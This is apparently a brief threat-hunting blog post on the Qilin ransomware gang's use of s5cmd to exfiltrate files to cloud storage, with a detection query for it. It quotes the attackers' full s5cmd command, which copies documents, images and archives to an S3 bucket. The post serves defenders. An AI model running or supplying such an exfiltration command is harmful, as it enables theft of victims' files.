232. Qilin Ransomware Gang Abuses S5cmd for Data Exfiltration

Hello everyone!

Data exfiltration. Almost every ransomware-related incident includes this stage. And adversaries often experiment with various free tools to evade defenses. And today we're going to talk about the following technique: Transfer Data to Cloud Account (T1537).

Huntress noted that in a recent Qilin ransomware attack the adversary used s5cmd for exfiltration:

s5cmd  --credentials-file credentials cp --include "*.pdf" --include "*.png" --include "*.jpg" --include "*.jpeg" --include "*.xls" --include "*.xlsx" --include "*.tif" --include "*.zip" --include "*.doc" --include "*.docx" "[Folder]" s3://[Resource]

For detection, we can use, for example, popular file types:

event_type: "processcreatewin"

AND

cmdline: ("include" AND "pdf" AND "xls" AND "doc")

See you tomorrow!

Comments

Popular posts from this blog

033. Free Google Threat Intelligence Course

082. Huniting for Malicious Browser Extensions

001. The Zeltser Challenge